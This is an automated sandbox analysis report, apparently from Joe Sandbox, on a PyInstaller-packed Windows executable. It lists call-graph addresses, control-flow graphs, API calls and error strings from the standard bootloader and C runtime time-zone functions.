7ff6029b4456 71329 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71315->71329 71318 7ff6029b4481 71317->71318 71319 7ff6029ae923 71317->71319 71330 7ff6029a4144 11 API calls _get_daylight 71318->71330 71319->71289 71319->71296 71321 7ff6029b4486 71331 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71321->71331 71323->71298 71324->71298 71326->71309 71327->71307 71328->71315 71329->71313 71330->71321 71331->71319 71332 7ff60299bcac 71353 7ff60299be7c 71332->71353 71335 7ff60299bdf8 71468 7ff60299c19c 7 API calls 2 library calls 71335->71468 71336 7ff60299bcc8 __scrt_acquire_startup_lock 71338 7ff60299be02 71336->71338 71342 7ff60299bce6 __scrt_release_startup_lock 71336->71342 71469 7ff60299c19c 7 API calls 2 library calls 71338->71469 71340 7ff60299bd0b 71341 7ff60299be0d __CxxCallCatchBlock 71342->71340 71343 7ff60299bd91 71342->71343 71465 7ff6029a89ac 45 API calls 71342->71465 71359 7ff60299c2e4 71343->71359 71345 7ff60299bd96 71362 7ff602991000 71345->71362 71350 7ff60299bdb9 71350->71341 71467 7ff60299c000 7 API calls 71350->71467 71352 7ff60299bdd0 71352->71340 71354 7ff60299be84 71353->71354 71355 7ff60299be90 __scrt_dllmain_crt_thread_attach 71354->71355 71356 7ff60299be9d 71355->71356 71358 7ff60299bcc0 71355->71358 71356->71358 71470 7ff60299c8f8 7 API calls 2 library calls 71356->71470 71358->71335 71358->71336 71471 7ff6029b9530 71359->71471 71363 7ff602991009 71362->71363 71473 7ff6029a44e4 71363->71473 71365 7ff60299352b 71480 7ff6029933e0 71365->71480 71369 7ff60299b5c0 _log10_special 8 API calls 71371 7ff60299372a 71369->71371 71466 7ff60299c328 GetModuleHandleW 71371->71466 71372 7ff602993736 71375 7ff602993f50 108 API calls 71372->71375 71373 7ff60299356c 71374 7ff602991bf0 49 API calls 71373->71374 71392 7ff602993588 71374->71392 71376 7ff602993746 71375->71376 71377 7ff602993785 71376->71377 71566 7ff6029975f0 71376->71566 71575 7ff6029925f0 53 API calls _log10_special 71377->71575 71381 7ff60299365f __vcrt_freefls 71388 7ff602993844 71381->71388 71390 7ff602997d60 14 API calls 71381->71390 71382 7ff602993538 71382->71369 71383 7ff602993778 71384 7ff60299379f 71383->71384 71385 7ff60299377d 71383->71385 71387 7ff602991bf0 49 API calls 71384->71387 71386 7ff60299f0bc 74 API calls 71385->71386 71386->71377 71389 7ff6029937be 71387->71389 71579 7ff602993e70 49 API calls 71388->71579 71400 7ff6029918f0 115 API calls 71389->71400 71393 7ff6029936ae 71390->71393 71542 7ff602997d60 71392->71542 71564 7ff602997ed0 40 API calls __vcrt_freefls 71393->71564 71394 7ff602993852 71396 7ff602993871 71394->71396 71397 7ff602993865 71394->71397 71399 7ff602991bf0 49 API calls 71396->71399 71580 7ff602993fc0 71397->71580 71415 7ff602993805 __vcrt_freefls 71399->71415 71402 7ff6029937df 71400->71402 71401 7ff6029936bd 71403 7ff60299380f 71401->71403 71404 7ff6029936cf 71401->71404 71402->71392 71407 7ff6029937ef 71402->71407 71577 7ff602998160 58 API calls _log10_special 71403->71577 71408 7ff602991bf0 49 API calls 71404->71408 71406 7ff602998410 2 API calls 71410 7ff60299389e SetDllDirectoryW 71406->71410 71576 7ff6029925f0 53 API calls _log10_special 71407->71576 71412 7ff6029936f1 71408->71412 71409 7ff602993814 71578 7ff602997b90 84 API calls 2 library calls 71409->71578 71418 7ff6029938c3 71410->71418 71412->71415 71416 7ff6029936fc 71412->71416 71415->71406 71565 7ff6029925f0 53 API calls _log10_special 71416->71565 71421 7ff602993a38 71418->71421 71583 7ff602996530 53 API calls 71418->71583 71420 7ff602993834 71420->71388 71420->71415 71423 7ff602993a42 PostMessageW GetMessageW 71421->71423 71424 7ff602993a65 71421->71424 71423->71424 71555 7ff602993080 71424->71555 71425 7ff6029938d5 71584 7ff602996aa0 118 API calls 2 library calls 71425->71584 71427 7ff6029938ea 71428 7ff602993947 71427->71428 71430 7ff602993901 71427->71430 71585 7ff602996570 121 API calls _log10_special 71427->71585 71428->71421 71435 7ff60299395c 71428->71435 71444 7ff602993905 71430->71444 71586 7ff602996910 89 API calls 71430->71586 71590 7ff6029930e0 122 API calls 2 library calls 71435->71590 71436 7ff602993916 71436->71444 71587 7ff602996c70 54 API calls 71436->71587 71437 7ff602993a7f 71593 7ff602996750 FreeLibrary 71437->71593 71440 7ff602993964 71440->71382 71443 7ff60299396c 71440->71443 71442 7ff602993a8b 71591 7ff602998140 LocalFree 71443->71591 71444->71428 71588 7ff602992870 53 API calls _log10_special 71444->71588 71447 7ff60299393f 71589 7ff602996750 FreeLibrary 71447->71589 71465->71343 71466->71350 71467->71352 71468->71338 71469->71341 71470->71358 71472 7ff60299c2fb GetStartupInfoW 71471->71472 71472->71345 71474 7ff6029ae300 71473->71474 71476 7ff6029ae3a6 71474->71476 71477 7ff6029ae353 71474->71477 71595 7ff6029ae1d8 71 API calls _fread_nolock 71476->71595 71594 7ff6029a9694 37 API calls 2 library calls 71477->71594 71479 7ff6029ae37c 71479->71365 71596 7ff60299b8c0 71480->71596 71483 7ff602993438 71598 7ff602998300 FindFirstFileExW 71483->71598 71484 7ff60299341b 71603 7ff6029929e0 51 API calls _log10_special 71484->71603 71487 7ff60299342e 71492 7ff60299b5c0 _log10_special 8 API calls 71487->71492 71489 7ff6029934a5 71606 7ff6029984c0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 71489->71606 71490 7ff60299344b 71604 7ff602998380 CreateFileW GetFinalPathNameByHandleW CloseHandle 71490->71604 71495 7ff6029934dd 71492->71495 71494 7ff602993458 71497 7ff602993474 __vcrt_InitializeCriticalSectionEx 71494->71497 71498 7ff60299345c 71494->71498 71495->71382 71502 7ff6029918f0 71495->71502 71496 7ff6029934b3 71496->71487 71607 7ff6029926c0 49 API calls _log10_special 71496->71607 71497->71489 71605 7ff6029926c0 49 API calls _log10_special 71498->71605 71501 7ff60299346d 71501->71487 71503 7ff602993f50 108 API calls 71502->71503 71504 7ff602991925 71503->71504 71506 7ff6029975f0 83 API calls 71504->71506 71512 7ff602991bb6 71504->71512 71505 7ff60299b5c0 _log10_special 8 API calls 71507 7ff602991bd1 71505->71507 71508 7ff60299196b 71506->71508 71507->71372 71507->71373 71509 7ff60299f744 73 API calls 71508->71509 71541 7ff60299199c 71508->71541 71511 7ff602991985 71509->71511 71510 7ff60299f0bc 74 API calls 71510->71512 71513 7ff6029919a1 71511->71513 71514 7ff602991989 71511->71514 71512->71505 71516 7ff60299f40c _fread_nolock 53 API calls 71513->71516 71608 7ff602992760 53 API calls 2 library calls 71514->71608 71517 7ff6029919b9 71516->71517 71518 7ff6029919bf 71517->71518 71519 7ff6029919d7 71517->71519 71609 7ff602992760 53 API calls 2 library calls 71518->71609 71521 7ff6029919ee 71519->71521 71522 7ff602991a06 71519->71522 71610 7ff602992760 53 API calls 2 library calls 71521->71610 71523 7ff602991bf0 49 API calls 71522->71523 71525 7ff602991a1d 71523->71525 71526 7ff602991bf0 49 API calls 71525->71526 71527 7ff602991a68 71526->71527 71528 7ff60299f744 73 API calls 71527->71528 71529 7ff602991a8c 71528->71529 71530 7ff602991aa1 71529->71530 71531 7ff602991ab9 71529->71531 71611 7ff602992760 53 API calls 2 library calls 71530->71611 71533 7ff60299f40c _fread_nolock 53 API calls 71531->71533 71534 7ff602991ace 71533->71534 71535 7ff602991ad4 71534->71535 71536 7ff602991aec 71534->71536 71612 7ff602992760 53 API calls 2 library calls 71535->71612 71613 7ff60299f180 37 API calls 2 library calls 71536->71613 71539 7ff602991b06 71539->71541 71614 7ff6029925f0 53 API calls _log10_special 71539->71614 71541->71510 71541->71541 71543 7ff602997d6a 71542->71543 71544 7ff602998410 2 API calls 71543->71544 71545 7ff602997d89 GetEnvironmentVariableW 71544->71545 71546 7ff602997df2 71545->71546 71547 7ff602997da6 ExpandEnvironmentStringsW 71545->71547 71548 7ff60299b5c0 _log10_special 8 API calls 71546->71548 71547->71546 71549 7ff602997dc8 71547->71549 71550 7ff602997e04 71548->71550 71615 7ff6029984c0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 71549->71615 71550->71381 71552 7ff602997dda 71553 7ff60299b5c0 _log10_special 8 API calls 71552->71553 71554 7ff602997dea 71553->71554 71554->71381 71616 7ff602995ad0 71555->71616 71559 7ff6029930a1 71563 7ff6029930b9 71559->71563 71686 7ff6029957e0 71559->71686 71561 7ff6029930ad 71561->71563 71695 7ff602995970 53 API calls 71561->71695 71592 7ff6029933a0 FreeLibrary 71563->71592 71564->71401 71565->71382 71567 7ff602997614 71566->71567 71568 7ff60299f744 73 API calls 71567->71568 71573 7ff6029976eb __vcrt_freefls 71567->71573 71569 7ff602997630 71568->71569 71569->71573 71758 7ff6029a6928 71569->71758 71571 7ff60299f744 73 API calls 71574 7ff602997645 71571->71574 71572 7ff60299f40c _fread_nolock 53 API calls 71572->71574 71573->71383 71574->71571 71574->71572 71574->71573 71575->71382 71576->71382 71577->71409 71578->71420 71579->71394 71581 7ff602991bf0 49 API calls 71580->71581 71582 7ff602993ff0 71581->71582 71582->71415 71583->71425 71584->71427 71585->71430 71586->71436 71587->71444 71588->71447 71589->71428 71590->71440 71592->71437 71593->71442 71594->71479 71595->71479 71597 7ff6029933ec GetModuleFileNameW 71596->71597 71597->71483 71597->71484 71599 7ff60299833f FindClose 71598->71599 71600 7ff602998352 71598->71600 71599->71600 71601 7ff60299b5c0 _log10_special 8 API calls 71600->71601 71602 7ff602993442 71601->71602 71602->71489 71602->71490 71603->71487 71604->71494 71605->71501 71606->71496 71607->71487 71608->71541 71609->71541 71610->71541 71611->71541 71612->71541 71613->71539 71614->71541 71615->71552 71617 7ff602995ae5 71616->71617 71618 7ff602991bf0 49 API calls 71617->71618 71619 7ff602995b21 71618->71619 71620 7ff602995b2a 71619->71620 71621 7ff602995b4d 71619->71621 71706 7ff6029925f0 53 API calls _log10_special 71620->71706 71623 7ff602993fc0 49 API calls 71621->71623 71625 7ff602995b65 71623->71625 71624 7ff602995b83 71696 7ff602993ef0 71624->71696 71625->71624 71707 7ff6029925f0 53 API calls _log10_special 71625->71707 71628 7ff60299b5c0 _log10_special 8 API calls 71629 7ff60299308e 71628->71629 71629->71563 71647 7ff602995c60 71629->71647 71631 7ff602995b9b 71633 7ff602993fc0 49 API calls 71631->71633 71634 7ff602995bb4 71633->71634 71635 7ff602995bd9 71634->71635 71636 7ff602995bb9 71634->71636 71638 7ff6029980f0 3 API calls 71635->71638 71708 7ff6029925f0 53 API calls _log10_special 71636->71708 71640 7ff602995be6 71638->71640 71639 7ff602995b43 71639->71628 71641 7ff602995bf2 71640->71641 71642 7ff602995c29 71640->71642 71643 7ff602998410 2 API calls 71641->71643 71710 7ff602995090 95 API calls 71642->71710 71645 7ff602995c0a 71643->71645 71709 7ff6029929e0 51 API calls _log10_special 71645->71709 71711 7ff602994c60 71647->71711 71649 7ff602995c9a 71650 7ff602995ca2 71649->71650 71651 7ff602995cb3 71649->71651 71743 7ff6029925f0 53 API calls _log10_special 71650->71743 71718 7ff602994430 71651->71718 71655 7ff602995cbf 71744 7ff6029925f0 53 API calls _log10_special 71655->71744 71656 7ff602995cd0 71658 7ff602995cdf 71656->71658 71659 7ff602995cf0 71656->71659 71745 7ff6029925f0 53 API calls _log10_special 71658->71745 71722 7ff6029946e0 71659->71722 71660 7ff602995cae 71660->71559 71663 7ff602995d0b 71664 7ff602995d0f 71663->71664 71665 7ff602995d20 71663->71665 71746 7ff6029925f0 53 API calls _log10_special 71664->71746 71667 7ff602995d2f 71665->71667 71668 7ff602995d40 71665->71668 71747 7ff6029925f0 53 API calls _log10_special 71667->71747 71729 7ff602994580 71668->71729 71672 7ff602995d4f 71748 7ff6029925f0 53 API calls _log10_special 71672->71748 71673 7ff602995d60 71675 7ff602995d6f 71673->71675 71676 7ff602995d80 71673->71676 71749 7ff6029925f0 53 API calls _log10_special 71675->71749 71678 7ff602995d91 71676->71678 71679 7ff602995da2 71676->71679 71750 7ff6029925f0 53 API calls _log10_special 71678->71750 71682 7ff602995dcc 71679->71682 71751 7ff6029a6310 73 API calls 71679->71751 71682->71660 71753 7ff6029925f0 53 API calls _log10_special 71682->71753 71683 7ff602995dba 71752 7ff6029a6310 73 API calls 71683->71752 71687 7ff602995800 71686->71687 71687->71687 71688 7ff602995829 71687->71688 71694 7ff602995840 __vcrt_freefls 71687->71694 71757 7ff6029925f0 53 API calls _log10_special 71688->71757 71690 7ff602995835 71690->71561 71691 7ff60299594b 71691->71561 71692 7ff602991440 116 API calls 71692->71694 71693 7ff6029925f0 53 API calls 71693->71694 71694->71691 71694->71692 71694->71693 71695->71563 71697 7ff602993efa 71696->71697 71698 7ff602998410 2 API calls 71697->71698 71699 7ff602993f1f 71698->71699 71700 7ff60299b5c0 _log10_special 8 API calls 71699->71700 71701 7ff602993f47 71700->71701 71701->71631 71702 7ff6029980f0 71701->71702 71703 7ff602998410 2 API calls 71702->71703 71704 7ff602998104 LoadLibraryExW 71703->71704 71705 7ff602998123 __vcrt_freefls 71704->71705 71705->71631 71706->71639 71707->71624 71708->71639 71709->71639 71710->71639 71713 7ff602994c8c 71711->71713 71712 7ff602994c94 71712->71649 71713->71712 71715 7ff602994e34 71713->71715 71754 7ff6029a5b04 48 API calls 71713->71754 71714 7ff602994ff7 __vcrt_freefls 71714->71649 71715->71714 71716 7ff602994160 47 API calls 71715->71716 71716->71715 71719 7ff602994460 71718->71719 71720 7ff60299b5c0 _log10_special 8 API calls 71719->71720 71721 7ff6029944ca 71720->71721 71721->71655 71721->71656 71723 7ff60299474f 71722->71723 71727 7ff6029946fb 71722->71727 71756 7ff6029942e0 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 71723->71756 71725 7ff60299475c 71725->71663 71728 7ff60299473a 71727->71728 71755 7ff6029942e0 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 71727->71755 71728->71663 71730 7ff602994595 71729->71730 71731 7ff602991bf0 49 API calls 71730->71731 71732 7ff6029945e1 71731->71732 71733 7ff602991bf0 49 API calls 71732->71733 71742 7ff602994667 __vcrt_freefls 71732->71742 71735 7ff602994620 71733->71735 71734 7ff60299b5c0 _log10_special 8 API calls 71736 7ff6029946bc 71734->71736 71737 7ff602998410 2 API calls 71735->71737 71735->71742 71736->71672 71736->71673 71738 7ff60299463a 71737->71738 71739 7ff602998410 2 API calls 71738->71739 71740 7ff602994651 71739->71740 71741 7ff602998410 2 API calls 71740->71741 71741->71742 71742->71734 71743->71660 71744->71660 71745->71660 71746->71660 71747->71660 71748->71660 71749->71660 71750->71660 71751->71683 71752->71682 71753->71660 71754->71713 71755->71728 71756->71725 71757->71690 71759 7ff6029a6958 71758->71759 71762 7ff6029a6434 71759->71762 71761 7ff6029a6971 71761->71574 71763 7ff6029a644f 71762->71763 71764 7ff6029a647e 71762->71764 71773 7ff6029a9694 37 API calls 2 library calls 71763->71773 71772 7ff6029a44cc EnterCriticalSection 71764->71772 71767 7ff6029a646f 71767->71761 71768 7ff6029a6483 71769 7ff6029a64a0 38 API calls 71768->71769 71770 7ff6029a648f 71769->71770 71771 7ff6029a44d8 _fread_nolock LeaveCriticalSection 71770->71771 71771->71767 71773->71767

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00007FF602991000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 332COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 0 7ff602991000-7ff602993536 call 7ff60299ee88 call 7ff60299ee90 call 7ff60299b8c0 call 7ff6029a4450 call 7ff6029a44e4 call 7ff6029933e0 14 7ff602993544-7ff602993566 call 7ff6029918f0 0->14 15 7ff602993538-7ff60299353f 0->15 21 7ff602993736-7ff60299374c call 7ff602993f50 14->21 22 7ff60299356c-7ff602993583 call 7ff602991bf0 14->22 16 7ff60299371a-7ff602993735 call 7ff60299b5c0 15->16 29 7ff60299374e-7ff60299377b call 7ff6029975f0 21->29 30 7ff602993785-7ff60299379a call 7ff6029925f0 21->30 25 7ff602993588-7ff6029935c1 22->25 27 7ff602993653-7ff60299366d call 7ff602997d60 25->27 28 7ff6029935c7-7ff6029935cb 25->28 44 7ff60299366f-7ff602993675 27->44 45 7ff602993695-7ff60299369c 27->45 32 7ff602993638-7ff60299364d call 7ff6029918e0 28->32 33 7ff6029935cd-7ff6029935e5 call 7ff6029a42b0 28->33 41 7ff60299379f-7ff6029937be call 7ff602991bf0 29->41 42 7ff60299377d-7ff602993780 call 7ff60299f0bc 29->42 47 7ff602993712 30->47 32->27 32->28 52 7ff6029935f2-7ff60299360a call 7ff6029a42b0 33->52 53 7ff6029935e7-7ff6029935eb 33->53 61 7ff6029937c1-7ff6029937ca 41->61 42->30 50 7ff602993682-7ff602993690 call 7ff6029a3eac 44->50 51 7ff602993677-7ff602993680 44->51 54 7ff6029936a2-7ff6029936c0 call 7ff602997d60 call 7ff602997ed0 45->54 55 7ff602993844-7ff602993863 call 7ff602993e70 45->55 47->16 50->45 51->50 66 7ff602993617-7ff60299362f call 7ff6029a42b0 52->66 67 7ff60299360c-7ff602993610 52->67 53->52 80 7ff60299380f-7ff60299381e call 7ff602998160 54->80 81 7ff6029936c6-7ff6029936c9 54->81 69 7ff602993871-7ff602993882 call 7ff602991bf0 55->69 70 7ff602993865-7ff60299386f call 7ff602993fc0 55->70 61->61 65 7ff6029937cc-7ff6029937e9 call 7ff6029918f0 61->65 65->25 85 7ff6029937ef-7ff602993800 call 7ff6029925f0 65->85 66->32 86 7ff602993631 66->86 67->66 77 7ff602993887-7ff6029938a1 call 7ff602998410 69->77 70->77 94 7ff6029938af-7ff6029938c1 SetDllDirectoryW 77->94 95 7ff6029938a3 77->95 92 7ff602993820 80->92 93 7ff60299382c-7ff602993836 call 7ff602997b90 80->93 81->80 82 7ff6029936cf-7ff6029936f6 call 7ff602991bf0 81->82 97 7ff602993805-7ff60299380d call 7ff6029a3eac 82->97 98 7ff6029936fc-7ff602993703 call 7ff6029925f0 82->98 85->47 86->32 92->93 93->77 111 7ff602993838 93->111 100 7ff6029938d0-7ff6029938ec call 7ff602996530 call 7ff602996aa0 94->100 101 7ff6029938c3-7ff6029938ca 94->101 95->94 97->77 110 7ff602993708-7ff60299370a 98->110 117 7ff6029938ee-7ff6029938f4 100->117 118 7ff602993947-7ff60299394a call 7ff6029964e0 100->118 101->100 105 7ff602993a38-7ff602993a40 101->105 108 7ff602993a42-7ff602993a5f PostMessageW GetMessageW 105->108 109 7ff602993a65-7ff602993a70 call 7ff6029933d0 call 7ff602993080 105->109 108->109 123 7ff602993a75-7ff602993a97 call 7ff6029933a0 call 7ff602996750 call 7ff6029964e0 109->123 110->47 111->55 120 7ff60299390e-7ff602993918 call 7ff602996910 117->120 121 7ff6029938f6-7ff602993903 call 7ff602996570 117->121 125 7ff60299394f-7ff602993956 118->125 134 7ff602993923-7ff602993931 call 7ff602996c70 120->134 135 7ff60299391a-7ff602993921 120->135 121->120 132 7ff602993905-7ff60299390c 121->132 125->105 129 7ff60299395c-7ff602993966 call 7ff6029930e0 125->129 129->110 141 7ff60299396c-7ff602993980 call 7ff602998140 129->141 137 7ff60299393a-7ff602993942 call 7ff602992870 call 7ff602996750 132->137 134->125 146 7ff602993933 134->146 135->137 137->118 151 7ff602993982-7ff60299399f PostMessageW GetMessageW 141->151 152 7ff6029939a5-7ff6029939e8 call 7ff602997e70 call 7ff602997f10 call 7ff602996750 call 7ff6029964e0 call 7ff602997e10 141->152 146->137 151->152 163 7ff602993a25-7ff602993a33 call 7ff6029918a0 152->163 164 7ff6029939ea-7ff6029939f8 152->164 163->110 165 7ff602993a19-7ff602993a20 call 7ff602992870 164->165 166 7ff6029939fa-7ff602993a14 call 7ff6029925f0 call 7ff6029918a0 164->166 165->163 166->110
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                            • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                            • API String ID: 514040917-585287483
                                                                                                                                                                                                                            • Opcode ID: 8dd58cd97c405040a77db062d9acfda8e08e8378b8cbaa13dcca7cc5a35637ec
                                                                                                                                                                                                                            • Instruction ID: 3e3a978948b26bc0310a5d795479d52a3854b72f0760146adda1935af088f458
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dd58cd97c405040a77db062d9acfda8e08e8378b8cbaa13dcca7cc5a35637ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F19021A08782A9FB19DB2BD5542F96B51FF447A8FA04032DA5DC32D7EFACE564C340
                                                                                                                                                                                                                            Function 00007FF6029B4A80 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 321 7ff6029b4a80-7ff6029b4abb call 7ff6029b4408 call 7ff6029b4410 call 7ff6029b4478 328 7ff6029b4ac1-7ff6029b4acc call 7ff6029b4418 321->328 329 7ff6029b4ce5-7ff6029b4d31 call 7ff6029a9780 call 7ff6029b4408 call 7ff6029b4410 call 7ff6029b4478 321->329 328->329 334 7ff6029b4ad2-7ff6029b4adc 328->334 355 7ff6029b4e6f-7ff6029b4edd call 7ff6029a9780 call 7ff6029b0304 329->355 356 7ff6029b4d37-7ff6029b4d42 call 7ff6029b4418 329->356 336 7ff6029b4afe-7ff6029b4b02 334->336 337 7ff6029b4ade-7ff6029b4ae1 334->337 341 7ff6029b4b05-7ff6029b4b0d 336->341 339 7ff6029b4ae4-7ff6029b4aef 337->339 342 7ff6029b4af1-7ff6029b4af8 339->342 343 7ff6029b4afa-7ff6029b4afc 339->343 341->341 345 7ff6029b4b0f-7ff6029b4b22 call 7ff6029ac47c 341->345 342->339 342->343 343->336 347 7ff6029b4b2b-7ff6029b4b39 343->347 352 7ff6029b4b24-7ff6029b4b26 call 7ff6029a97c8 345->352 353 7ff6029b4b3a-7ff6029b4b46 call 7ff6029a97c8 345->353 352->347 361 7ff6029b4b4d-7ff6029b4b55 353->361 373 7ff6029b4edf-7ff6029b4ee6 355->373 374 7ff6029b4eeb-7ff6029b4eee 355->374 356->355 365 7ff6029b4d48-7ff6029b4d53 call 7ff6029b4448 356->365 361->361 364 7ff6029b4b57-7ff6029b4b68 call 7ff6029af2f4 361->364 364->329 375 7ff6029b4b6e-7ff6029b4bc4 call 7ff6029b9530 * 4 call 7ff6029b499c 364->375 365->355 376 7ff6029b4d59-7ff6029b4d7c call 7ff6029a97c8 GetTimeZoneInformation 365->376 377 7ff6029b4f7b-7ff6029b4f7e 373->377 379 7ff6029b4ef0 374->379 380 7ff6029b4f25-7ff6029b4f38 call 7ff6029ac47c 374->380 433 7ff6029b4bc6-7ff6029b4bca 375->433 387 7ff6029b4e44-7ff6029b4e6e call 7ff6029b4400 call 7ff6029b43f0 call 7ff6029b43f8 376->387 388 7ff6029b4d82-7ff6029b4da3 376->388 384 7ff6029b4f84-7ff6029b4f8c call 7ff6029b4a80 377->384 385 7ff6029b4ef3 377->385 379->385 396 7ff6029b4f43-7ff6029b4f5e call 7ff6029b0304 380->396 397 7ff6029b4f3a 380->397 392 7ff6029b4ef8-7ff6029b4f24 call 7ff6029a97c8 call 7ff60299b5c0 384->392 385->392 393 7ff6029b4ef3 call 7ff6029b4cfc 385->393 394 7ff6029b4dae-7ff6029b4db5 388->394 395 7ff6029b4da5-7ff6029b4dab 388->395 393->392 402 7ff6029b4dc9 394->402 403 7ff6029b4db7-7ff6029b4dbf 394->403 395->394 420 7ff6029b4f60-7ff6029b4f63 396->420 421 7ff6029b4f65-7ff6029b4f77 call 7ff6029a97c8 396->421 404 7ff6029b4f3c-7ff6029b4f41 call 7ff6029a97c8 397->404 415 7ff6029b4dcb-7ff6029b4e3f call 7ff6029b9530 * 4 call 7ff6029b18dc call 7ff6029b4f94 * 2 402->415 403->402 409 7ff6029b4dc1-7ff6029b4dc7 403->409 404->379 409->415 415->387 420->404 421->377 435 7ff6029b4bd0-7ff6029b4bd4 433->435 436 7ff6029b4bcc 433->436 435->433 438 7ff6029b4bd6-7ff6029b4bfb call 7ff6029a5bb8 435->438 436->435 445 7ff6029b4bfe-7ff6029b4c02 438->445 447 7ff6029b4c11-7ff6029b4c15 445->447 448 7ff6029b4c04-7ff6029b4c0f 445->448 447->445 448->447 450 7ff6029b4c17-7ff6029b4c1b 448->450 452 7ff6029b4c9c-7ff6029b4ca0 450->452 453 7ff6029b4c1d-7ff6029b4c45 call 7ff6029a5bb8 450->453 454 7ff6029b4ca2-7ff6029b4ca4 452->454 455 7ff6029b4ca7-7ff6029b4cb4 452->455 462 7ff6029b4c63-7ff6029b4c67 453->462 463 7ff6029b4c47 453->463 454->455 457 7ff6029b4ccf-7ff6029b4cde call 7ff6029b4400 call 7ff6029b43f0 455->457 458 7ff6029b4cb6-7ff6029b4ccc call 7ff6029b499c 455->458 457->329 458->457 462->452 466 7ff6029b4c69-7ff6029b4c87 call 7ff6029a5bb8 462->466 464 7ff6029b4c4a-7ff6029b4c51 463->464 464->462 468 7ff6029b4c53-7ff6029b4c61 464->468 473 7ff6029b4c93-7ff6029b4c9a 466->473 468->462 468->464 473->452 474 7ff6029b4c89-7ff6029b4c8d 473->474 474->452 475 7ff6029b4c8f 474->475 475->473
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4AC5
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: HeapFree.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A9780: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A9789
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A9780: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A97AE
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4AB4
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D2A
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D3B
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D4C
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
